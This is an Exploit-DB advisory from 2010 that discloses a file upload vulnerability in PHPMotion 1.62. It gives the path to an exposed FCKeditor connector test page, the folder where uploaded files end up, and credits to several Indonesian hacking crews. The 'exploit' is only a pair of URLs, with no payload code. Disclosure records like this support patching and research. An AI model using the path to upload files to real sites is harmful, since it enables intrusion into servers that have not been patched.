PHPMotion 1.62 - FCKeditor File Upload Vulnerability

2010-11-23T00:00:00
ID EDB-ID:15602
Type exploitdb
Reporter trycyber
Modified 2010-11-23T00:00:00

Description

PHPMotion 1.62 - (FCKeditor) File Upload Vulnerability. Webapps exploit for php platform

                                        
                                            -----------------------------------------------------------------------
phpmotion/FCKeditor  File upload vulnerabilities
-----------------------------------------------------------------------
Author		: trycyber (trycyber@magelangcyber.com)
Homepage	: http://indonesiancoder.com,magelangcyber.web.id
Vendor		: http://www.phpmotion.com/
Dork		: CIHUY ;p
Version     	: 1.62
Tested on	: Win Xp sp2	
Date		: November 23, 2010
-----------------------------------------------------------------------

I.  POC & Exploit
-----------------------------------------------------------------------
Default 	:	http://127.0.0.1/


exploit 	:	http://127.0.0.1/phpmotion/fckeditor/editor/filemanager/connectors/test.html
			

results in	:	http://127.0.0.1/userfiles/name of file	 


------------------------------------------------------------------------
Credits
------------------------------------------------------------------------
Allahu Akbar
INDONESIAN CODER ~ Magelangcyber-team ~ Kill-9 Crew ~ MC Crew
Don Tukulesto ~ kaMtiEz ~ ibl13z ~ Jundab ~ N4ck0 ~ Yurakha ~ aN93l1c ~  Mboys ~ Contrex ~  n4KuLa_
k4L0ng666 ~ Xr0b0t ~ Adipati ~ Arianom ~ t3ll0 ~ cimpli ~ Pathloader

-------------------------------------------------------------------------
"aku belajar bukan karenamu, melainkan aku ingin aku menjadi aku"

Indonesiancoder family & Magelangcyber family